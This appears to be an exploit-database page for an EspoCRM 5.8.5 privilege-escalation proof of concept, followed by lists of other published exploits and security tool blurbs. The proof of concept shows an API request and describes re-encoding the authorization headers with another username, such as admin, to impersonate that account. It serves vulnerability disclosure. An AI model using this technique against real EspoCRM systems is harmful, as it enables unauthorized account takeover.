Menu

Search for hundreds of thousands of exploits

"EspoCRM 5.8.5 - Privilege Escalation"

Author

Exploit author

Besim

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-04-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation
# Author: Besim ALTINOK
# Vendor Homepage: https://www.espocrm.com
# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip
# Version: v5.8.5
# Tested on: Xampp
# Credit: İsmail BOZKURT

-------------

Details:
--------------------------------------------

1- When we sent a request to the /api/v1/App/user, we can see user details
---
First Request:
---------------------------
GET /api/v1/App/user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 *************************
Authorization: Basic *************************************
Espo-Authorization: *************************************
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: auth-token-secret=cdc7f7*********************377;
auth-username=user1; auth-token=3a874a********************************48
----

2- When we decode Basic Authorization and Espo-Authorization and change the
value with another username (like admin)  in the first request, we can see
other user information and access like BOSS
----------

3- Some Examples and encode technique

- BASE64:
First type: dXNlcjE6MQ== (user1:1)
Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2020-05-12 "qdPM 9.1 - Arbitrary File Upload" webapps php Besim
2020-05-11 "CuteNews 2.1.2 - Arbitrary File Deletion" webapps php Besim
2020-05-06 "Booked Scheduler 2.7.7 - Authenticated Directory Traversal" webapps php Besim
2020-05-06 "webTareas 2.0.p8 - Arbitrary File Deletion" webapps php Besim
2020-05-06 "i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion" webapps php Besim
2020-05-05 "PhreeBooks ERP 5.2.5 - Remote Command Execution" webapps php Besim
2020-05-05 "webERP 4.15.1 - Unauthenticated Backup File Access" webapps php Besim
2020-04-29 "School ERP Pro 1.0 - Arbitrary File Read" webapps php Besim
2020-04-28 "School ERP Pro 1.0 - Remote Code Execution" webapps php Besim
2020-04-28 "School ERP Pro 1.0 - 'es_messagesid' SQL Injection" webapps php Besim
2020-04-27 "Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak" webapps hardware Besim
2020-04-27 "Netis E1+ 1.2.32533 - Backdoor Account (root)" webapps hardware Besim
2020-04-27 "PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload" webapps php Besim
2020-04-27 "Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)" webapps php Besim
2020-04-24 "EspoCRM 5.8.5 - Privilege Escalation" webapps multiple Besim
2020-04-24 "Edimax EW-7438RPn 1.13 - Remote Code Execution" webapps hardware Besim
2020-04-23 "User Management System 2.0 - Persistent Cross-Site Scripting" webapps php Besim
2020-04-23 "Complaint Management System 4.2 - Authentication Bypass" webapps php Besim
2020-04-23 "User Management System 2.0 - Authentication Bypass" webapps php Besim
2020-04-23 "Complaint Management System 4.2 - Persistent Cross-Site Scripting" webapps php Besim
2020-04-23 "Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)" webapps php Besim
2020-04-22 "Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)" webapps hardware Besim
2020-04-22 "Edimax EW-7438RPn - Information Disclosure (WiFi Password)" webapps hardware Besim
2016-10-31 "S9Y Serendipity 2.0.4 - Cross-Site Scripting" webapps php Besim
2016-10-23 "Zenbership 107 - Multiple Vulnerabilities" webapps php Besim
2016-10-19 "CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload" webapps php Besim
2016-10-13 "Colorful Blog - Persistent Cross-Site Scripting" webapps php Besim
2016-10-13 "Thatware 0.4.6 - SQL Injection" webapps php Besim
2016-10-13 "Colorful Blog - Cross-Site Request Forgery (Change Admin Password)" webapps php Besim
2016-10-13 "JonhCMS 4.5.1 - SQL Injection" webapps php Besim
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.